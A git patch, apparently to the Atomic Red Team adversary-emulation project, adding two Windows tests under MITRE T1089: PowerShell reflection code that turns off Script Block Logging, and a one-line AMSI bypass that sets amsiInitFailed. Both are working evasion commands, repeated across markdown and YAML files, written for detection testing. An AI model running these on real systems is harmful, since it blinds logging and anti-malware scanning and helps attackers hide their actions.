From 6d76b77fc4d8a7b7c360992300c239297171dde7 Mon Sep 17 00:00:00 2001
From: Tony M Lambert <ForensicITGuy@users.noreply.github.com>
Date: Tue, 26 Nov 2019 19:06:03 -0600
Subject: [PATCH] T1089 Disable AMSI & Script Block Logging (#695)

* T1089 Disable PoSH AMSI & Script Block Logging

* Generate docs from job=validate_atomics_generate_docs branch=t1089-disable-amsi-logging
---
 atomics/T1089/T1089.md   | 50 ++++++++++++++++++++++++++++++++++++++++
 atomics/T1089/T1089.yaml | 36 ++++++++++++++++++++++++++++-
 atomics/index.md         |  2 ++
 atomics/index.yaml       | 29 ++++++++++++++++++++++-
 atomics/windows-index.md |  2 ++
 5 files changed, 117 insertions(+), 2 deletions(-)

diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 745b8a88..5f387adb 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -30,6 +30,10 @@
 
 - [Atomic Test #13 - Disable Arbitrary Security Windows Service](#atomic-test-13---disable-arbitrary-security-windows-service)
 
+- [Atomic Test #14 - Disable PowerShell Script Block Logging](#atomic-test-14---disable-powershell-script-block-logging)
+
+- [Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface](#atomic-test-15---powershell-bypass-of-antimalware-scripting-interface)
+
 
 <br/>
 
@@ -311,4 +315,50 @@ sc.exe config #{service_name} start= auto
 net.exe start #{service_name}
 ```
 
+<br/>
+<br/>
+
+## Atomic Test #14 - Disable PowerShell Script Block Logging
+An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. 
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! 
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+```
+
+
+#### Cleanup Commands:
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+```
+
+<br/>
+<br/>
+
+## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
+An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. 
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! 
+```
+[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+```
+
+
+
 <br/>
diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml
index 4ede9312..86b5e4c7 100644
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -200,4 +200,38 @@ atomic_tests:
        sc.exe config #{service_name} start= disabled
     cleanup_command: |
        sc.exe config #{service_name} start= auto
-       net.exe start #{service_name}
\ No newline at end of file
+       net.exe start #{service_name}
+
+- name: Disable PowerShell Script Block Logging
+  description: |
+    An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. 
+
+    Credit to Matt Graeber (@mattifestation) for the research.
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+      $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+    cleanup_command: |
+      $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+      $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+      $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+
+- name: PowerShell Bypass of AntiMalware Scripting Interface
+  description: |
+    An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. 
+
+    Credit to Matt Graeber (@mattifestation) for the research.
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
\ No newline at end of file
diff --git a/atomics/index.md b/atomics/index.md
index 057a98e3..e102fa0c 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -213,6 +213,8 @@
   - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
   - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
   - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+  - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+  - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index b3bc0108..66aeab8e 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -6978,9 +6978,36 @@ defense-evasion:
         command: |
           net.exe stop #{service_name}
           sc.exe config #{service_name} start= disabled
-        cleanup_command: |-
+        cleanup_command: |
           sc.exe config #{service_name} start= auto
           net.exe start #{service_name}
+    - name: Disable PowerShell Script Block Logging
+      description: "An adversary may disable PowerShell Script Block Logging to avoid
+        leaving evidence. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+          $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+          $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+          $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+        cleanup_command: |
+          $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+          $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+          $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+          $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+    - name: PowerShell Bypass of AntiMalware Scripting Interface
+      description: "An adversary may bypass Windows Defender AMSI to execute malicious
+        PowerShell code. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
   T1107:
     technique:
       x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 978851a6..cf69e36c 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -43,6 +43,8 @@
   - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
   - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
   - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+  - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+  - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)